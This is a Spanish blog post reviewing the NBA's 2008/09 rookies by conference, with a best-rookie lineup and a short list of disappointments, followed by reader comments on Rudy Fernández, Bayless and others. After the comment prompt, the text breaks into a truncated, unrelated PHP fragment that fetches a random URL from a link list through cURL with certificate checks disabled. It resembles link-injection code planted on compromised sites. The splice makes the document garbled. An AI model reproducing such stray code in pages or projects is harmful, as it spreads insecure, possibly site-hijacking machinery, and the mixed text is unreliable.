Seguimiento rookies 2008/2009

30 de November de 2008 por Viva_Dirk

Con un mes de competición podemos hacer un análisis mas profundo de que esta pasando con los novatos, además de los habituales quintetos de cada conferencia, añadiremos las decepciones y el mejor quinteto de la liga.

Oeste

George Hill: Impresionante rendimiento que ha ofrecido con la baja de Parker. Tras tres años de universidad Hill llega completamente formado a la liga, listo para rendir y para colmo en los Spurs. Sus 11.7 puntos, 3.4 rebotes y 3.2 asistencias en 24 minutos son una buena carta de presentación y ha dejado ver su juego atlético y serio, Popovich sigue dando campanadas en el draft.

OJ Mayo: No diré mucho mas de lo que ya he dicho:21.4 puntos por partido, 4.5 rebotes, 2.1 asistencias, 1.2 robos y 2.5 pérdidas de balón. Sigue siendo el rookie que más juega, que más anota y que más lanza a canasta. Sus porcentajes en tiros de campo están por encima del 45% y en triples en un 38.

Rudy Fernandez: Flojos partidos de Rudy los últimos dias, y es que ya le han visto y lo vigilan de cerca. En cuanto Roy o LaMarcus no pueden anotar, las defensas rivales se centran en Rudy y es algo a lo que deben acostumbrarse tanto el jugador como McMillan. Sigue tirando mas de 3 que de 2, y promedia 11.6 puntosp or noche con un tremendo 43% en triples.

Jason Thompson: Otro que ha pasado muchos años en la universidad y llega listo para la competición. En 26 minutos sus registros son de 11.2 puntos y 6.8 rebotes con un 55% en tiros de campo. Ya ha dejado alguna exhibición en el camino y es un jugador acostumbrado a liderar un equipo.

Marc Gasol: Sigue su habitual juego de más nueces que ruido. Sin tener ni una sola jugada preparada para él y viviendo de los balones que Mayo y los bases le dan, Marc sigue con buenos números y mejores sensaciones: en 30 minutos promedia 12 puntos y 7.3 rebotes. Con el tiempo seguro que mejora las pérdidas de balón.

Westbrook se gana el puesto de sexto hombre, dando esperanzas a los que se arriesgaron elegiéndolo con el Nº4. Ya está en 12.3 puntos en 26 minutos de juego, pero los porcentajes y el ratio asistencias/pérdidas no mejora. Eric Gordon no tardará en aparecer por aquí si los Clippers siguen confiando en el como escolta titular.

Este

Derrick Rose: Tremenda lucha por el rookie del año se presenta, ya que si hemos echado flores al de Memphis no podemos hacer menos con Rose. Sus 18.4 puntos con casi un 50% en tiros, 4 rebotes y 5.8 asistencias son solo una muestra de lo que va a dar de si este jugón.

DJ Augustine: Las grandes actuaciones del base de Charlotte le sitúan en la élite de los novatos. Cuarto en anotación con 12.9 puntos en 29 minutos, su sociedad con Felton es de lo poco que puede dar color a los Bobcats.

Michael Beasley: Es verdad que habitualmente un Nº2 no tiene en su equipo a una megaestrella como Wade y a un All-Star como Marion, pero aun así Beasley nos esta decepcionando. Dominó la NCAA mas por físico que talento (aunque tiene de sobra también) y le está costando coger el ritmo.

Luc Mbah a Moute: Tras la sorpresa de las primeras semanas, está dejando ver el tipo de jugador que es. y tiene un puesto asegurado con Skiles precisamente por eso. Desde nuestro último artículo sigue en los mismos números.

Brook Lopez: Aprovechando al máximo el escaso juego interior de los Nets se ha hecho con el puesto de titular en un equipo que esta de moda en el Este. Ya alcanza los 10 puntos por noche con casi un 50% en tiros.

Mario Chalmers sigue jugando mucho en Miami y eso le vale para ganarse el banquillo del Este.

Decepciones

Kevin Love: Es la muestra de un jugador con un tremendo talento, con carácter, listo en la pista, pero que llega sin hacer a la liga. De hecho Craig Smith le está ganando la partida en los Wolves. Esperamos grandes cosas de él así que tendremos paciencia.

Quinteto rookie: Rose – Mayo – Beasley – Thompson – Gasol

Comenta

6 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Para Rudy… es normal que los rivales le aten más en corto. Lo que ya no es tan normal es que reciba tan pocos pases de sus compañeros y muchos menos en ventaja.
    Si al final Sergio se va, todavía perderá más…

    Creo que deberías haber mencionado alguna que otra decepción más (¿Baylesss??) y, Marc, como no cambie la cosa (que no va a ser) tiene las horas contadas en ese quinteto que has montado. (Sin quitarle ningún mérito, que bastante difícil lo tiene)

      Citar

  2. Jabho dice:
    #2

    Pues dentro del gran nivel general algún apunte.

    Es normal que Rudy haga partidos más flojos. A los rookies les cuesta jugar tantos partidos seguidos el primer año. Y como dice Deer además les falta el respeto arbitral y de los propios compañeros para poder hacer sus tiros. Es que no era normal al nivel al que habia empezado.

    De los no esperados muy bien Hill. Buenas cualidades atleticas y buen jugador. Popo,o quien sea, ha vuelto a acertar.

    Bayless mas que decepción la cosa es que no la huele. Malo para él y si tiene suerte un trade le debería dejar más minutos porque si no… Ahora vuelve Webster y menos bola todavía.

      Citar

  3. dunc dice:
    #3

    recomiendo ver el resumen del partido de esta noche bulls – sixers solo para ver tres jugadas de rose que a mi parecer son buenisimas, el tapon y el alley-hoop aparecen en las 10 mejores jugadas, pero hay un crossover a andre miller que es de lo mejorcito
    un saludo y a seguir asi

      Citar

  4. llukas70 dice:
    #4

    Creo que falta Anthony Morrow de Golden State y en decepciones Jerryd Bayless

      Citar

  5. Txusma dice:
    #5

    A mi por Morrow, en los ultimos partidos, no me viene nada. Y es que solo ha tenido 2 partidos realmente buenos (incluso increibles) en toda la temporada. Tras esos partidos, que hicieron que le echaramos un ojo, bien poquita cosa.
    Seguramente la llegada de Crawford le haya perjudicado enormemente.

      Citar

  6. Viva_Dirk dice:
    #6

    Bayless si no juega no podemos decir que no esté decepcionando. Oden esta cerca del bando de las decepciones, pero un par de buenos partidos le ponen peleando el puesto a Marc y Thompson.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>